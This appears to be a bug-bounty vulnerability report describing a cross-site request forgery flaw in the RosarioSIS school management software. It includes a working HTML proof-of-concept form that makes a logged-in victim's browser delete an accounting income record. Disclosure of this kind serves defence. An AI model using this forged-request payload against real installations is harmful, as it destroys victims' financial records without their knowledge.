Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis
✍ ️ Description
When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.
But Firefox and Safari ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.
In Firefox and safari and chrome I can delete any income With CSRF.
🕵 ️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.rosariosis.org/demonstration/Modules.php?modname=Accounting/Incomes.php&modfunc=remove&id=2" method="POST">
<input type="hidden" name="delete_ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Here you should run PoC.html, after click on button you can see an income with id equals to 2
have been deleted.
💥 Impact
This vulnerability is capable of delete any income .
References